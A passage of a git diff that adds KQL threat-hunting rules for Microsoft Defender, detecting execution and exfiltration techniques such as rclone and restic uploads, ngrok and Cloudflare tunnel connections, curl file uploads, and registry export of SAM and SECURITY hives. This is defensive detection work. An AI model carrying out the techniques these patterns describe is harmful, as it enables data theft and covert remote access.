"\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData") \ No newline at end of file diff --git a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql new file mode 100644 index 00000000..1ce27ea6 --- /dev/null +++ b/KQL/rules/Execution/wscript_shell_run_in_commandline.kql @@ -0,0 +1,12 @@ +// Title: Wscript Shell Run In CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-31 +// Level: medium +// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly + +DeviceProcessEvents +| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run" \ No newline at end of file diff --git a/KQL/rules/Execution/wsl_child_process_anomaly.kql b/KQL/rules/Execution/wsl_child_process_anomaly.kql new file mode 100644 index 00000000..ee953413 --- /dev/null +++ b/KQL/rules/Execution/wsl_child_process_anomaly.kql @@ -0,0 +1,10 @@ +// Title: WSL Child Process Anomaly +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-23 +// Level: medium +// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql new file mode 100644 index 00000000..9fc9c3c8 --- /dev/null +++ b/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql @@ -0,0 +1,12 @@ +// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-26 +// Level: high +// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. +Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges. + +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) and (not(ProcessCommandLine contains ".msu")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql new file mode 100644 index 00000000..c25f0f74 --- /dev/null +++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql @@ -0,0 +1,10 @@ +// Title: Active Directory Structure Export Via Csvde.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1087.002 + +DeviceProcessEvents +| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql new file mode 100644 index 00000000..5f3de5a1 --- /dev/null +++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql @@ -0,0 +1,10 @@ +// Title: Active Directory Structure Export Via Ldifde.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents +| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql new file mode 100644 index 00000000..eda1204f --- /dev/null +++ b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql @@ -0,0 +1,13 @@ +// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. +Users can configure different pilot collections for each of the co-management workloads. +It can be abused by attackers in order to upload or download files. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql new file mode 100644 index 00000000..e96ef768 --- /dev/null +++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql @@ -0,0 +1,15 @@ +// Title: Communication To Ngrok Tunneling Service Initiated +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-03 +// Level: high +// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. +Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 +// False Positives: +// - Legitimate use of the ngrok service. + +DeviceNetworkEvents +| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql new file mode 100644 index 00000000..f842d018 --- /dev/null +++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql @@ -0,0 +1,12 @@ +// Title: Communication To Ngrok Tunneling Service - Linux +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-03 +// Level: high +// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 +// False Positives: +// - Legitimate use of ngrok + +DeviceNetworkEvents +| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql new file mode 100644 index 00000000..ffa803a4 --- /dev/null +++ b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql @@ -0,0 +1,12 @@ +// Title: Disk Image Creation Via Hdiutil - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-10 +// Level: medium +// Description: Detects the execution of the hdiutil utility in order to create a disk image. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration +// False Positives: +// - Legitimate usage of hdiutil by administrators and users. + +DeviceProcessEvents +| where ProcessCommandLine contains "create" and FolderPath endswith "/hdiutil" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql new file mode 100644 index 00000000..32245d57 --- /dev/null +++ b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql @@ -0,0 +1,12 @@ +// Title: DNS Exfiltration and Tunneling Tools Execution +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Well-known DNS Exfiltration tools execution +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql new file mode 100644 index 00000000..ca744e1f --- /dev/null +++ b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql @@ -0,0 +1,10 @@ +// Title: Email Exifiltration Via Powershell +// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea) +// Date: 2022-09-09 +// Level: high +// Description: Detects email exfiltration via powershell cmdlets +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql new file mode 100644 index 00000000..f03b6c91 --- /dev/null +++ b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql @@ -0,0 +1,12 @@ +// Title: Exports Critical Registry Keys To a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the export of a crital Registry key to a file. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1012 +// False Positives: +// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation + +DeviceProcessEvents +| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql new file mode 100644 index 00000000..973dff8c --- /dev/null +++ b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql @@ -0,0 +1,12 @@ +// Title: Exports Registry Key To a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-07 +// Level: low +// Description: Detects the export of the target Registry key to a file. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1012 +// False Positives: +// - Legitimate export of keys + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security")))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql new file mode 100644 index 00000000..d38ffa8d --- /dev/null +++ b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql @@ -0,0 +1,14 @@ +// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe +// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger +// Date: 2021-09-30 +// Level: medium +// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567 +// False Positives: +// - DataSvcUtil.exe being used may be performed by a system administrator. +// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +// - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + +DeviceProcessEvents +| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql new file mode 100644 index 00000000..33cf9a91 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql @@ -0,0 +1,14 @@ +// Title: Network Connection Initiated To BTunnels Domains +// Author: Kamran Saifullah +// Date: 2024-09-13 +// Level: medium +// Description: Detects network connections to BTunnels domains initiated by a process on the system. +Attackers can abuse that feature to establish a reverse shell or persistence on a machine. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of BTunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".btunnel.co.in" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql new file mode 100644 index 00000000..78fc2960 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql @@ -0,0 +1,14 @@ +// Title: Network Connection Initiated To Cloudflared Tunnels Domains +// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-05-27 +// Level: medium +// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. +Attackers can abuse that feature to establish a reverse shell or persistence on a machine. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of cloudflare tunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql new file mode 100644 index 00000000..f415abb5 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql @@ -0,0 +1,13 @@ +// Title: Network Connection Initiated To DevTunnels Domain +// Author: Kamran Saifullah +// Date: 2023-11-20 +// Level: medium +// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572 +// False Positives: +// - Legitimate use of Devtunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".devtunnels.ms" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql new file mode 100644 index 00000000..af4e15e6 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql @@ -0,0 +1,14 @@ +// Title: Network Connection Initiated To Mega.nz +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-06 +// Level: low +// Description: Detects a network connection initiated by a binary to "api.mega.co.nz". +Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 +// False Positives: +// - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool. + +DeviceNetworkEvents +| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql new file mode 100644 index 00000000..4d666698 --- /dev/null +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql @@ -0,0 +1,13 @@ +// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain +// Author: Kamran Saifullah +// Date: 2023-11-20 +// Level: medium +// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".tunnels.api.visualstudio.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql new file mode 100644 index 00000000..dcb07426 --- /dev/null +++ b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql @@ -0,0 +1,15 @@ +// Title: Process Initiated Network Connection To Ngrok Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-16 +// Level: high +// Description: Detects an executable initiating a network connection to "ngrok" domains. +Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102 +// False Positives: +// - Legitimate use of the ngrok service. + +DeviceNetworkEvents +| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/pua_rclone_execution.kql b/KQL/rules/Exfiltration/pua_rclone_execution.kql new file mode 100644 index 00000000..e979ab9b --- /dev/null +++ b/KQL/rules/Exfiltration/pua_rclone_execution.kql @@ -0,0 +1,10 @@ +// Title: PUA - Rclone Execution +// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group +// Date: 2021-05-10 +// Level: high +// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql new file mode 100644 index 00000000..7ad87026 --- /dev/null +++ b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql @@ -0,0 +1,15 @@ +// Title: PUA - Restic Backup Tool Execution +// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-17 +// Level: high +// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration. +Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services. +If not legitimately used in the enterprise environment, its presence may indicate malicious activity. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048, attack.t1567.002 +// False Positives: +// - Legitimate use of Restic for backup purposes within the organization. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "sftp:" or ProcessCommandLine contains "rest:http" or ProcessCommandLine contains "s3:s3." or ProcessCommandLine contains "s3.http" or ProcessCommandLine contains "azure:" or ProcessCommandLine contains " gs:" or ProcessCommandLine contains "rclone:" or ProcessCommandLine contains "swift:" or ProcessCommandLine contains " b2:") and (ProcessCommandLine contains " init " and ProcessCommandLine contains " -r ")) or ((ProcessCommandLine contains "--password-file" and ProcessCommandLine contains "init" and ProcessCommandLine contains " -r ") or (ProcessCommandLine contains "--use-fs-snapshot" and ProcessCommandLine contains "backup" and ProcessCommandLine contains " -r ")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql new file mode 100644 index 00000000..023d6cf5 --- /dev/null +++ b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql @@ -0,0 +1,15 @@ +// Title: Python WebServer Execution - Linux +// Author: Mohamed LAKRI +// Date: 2025-10-17 +// Level: medium +// Description: Detects the execution of Python web servers via command line interface (CLI). +After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. +This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 +// False Positives: +// - Testing or development activity + +DeviceProcessEvents +| where ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) and (ProcessCommandLine contains "http.server" or ProcessCommandLine contains "SimpleHTTPServer") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/rclone_config_file_creation.kql b/KQL/rules/Exfiltration/rclone_config_file_creation.kql new file mode 100644 index 00000000..876c3f50 --- /dev/null +++ b/KQL/rules/Exfiltration/rclone_config_file_creation.kql @@ -0,0 +1,12 @@ +// Title: Rclone Config File Creation +// Author: Aaron Greetham (@beardofbinary) - NCC Group +// Date: 2021-05-26 +// Level: medium +// Description: Detects Rclone config files being created +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 +// False Positives: +// - Legitimate Rclone usage + +DeviceFileEvents +| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql new file mode 100644 index 00000000..fd3ff922 --- /dev/null +++ b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql @@ -0,0 +1,12 @@ +// Title: Split A File Into Pieces +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-15 +// Level: low +// Description: Detection use of the command "split" to split files into parts and possible transfer. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1030 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents +| where FolderPath endswith "/split" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql new file mode 100644 index 00000000..8cc06d5b --- /dev/null +++ b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Curl File Upload - Linux +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) +// Date: 2022-09-15 +// Level: medium +// Description: Detects a suspicious curl process start the adds a file to a web request +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105 +// False Positives: +// - Scripts created by developers and admins + +DeviceProcessEvents +| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and FolderPath endswith "/curl") and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql new file mode 100644 index 00000000..da3bcea0 --- /dev/null +++ b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Outbound SMTP Connections +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. +The data may also be sent to an alternate network location from the main command and control server. + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 +// False Positives: +// - Other SMTP tools + +DeviceNetworkEvents +| where (RemotePort in~ ("25", "587", "465", "2525")) and (not(((InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\" or (InitiatingProcessFolderPath endswith "\\HxTsr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_")))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql new file mode 100644 index 00000000..af385f82 --- /dev/null +++ b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql @@ -0,0 +1,10 @@ +// Title: Suspicious PowerShell Mailbox Export to Share +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-07 +// Level: critical +// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents +| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql new file mode 100644 index 00000000..0407bd60 --- /dev/null +++ b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Redirection to Local Admin Share +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-16 +// Level: high +// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048 + +DeviceProcessEvents +| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine 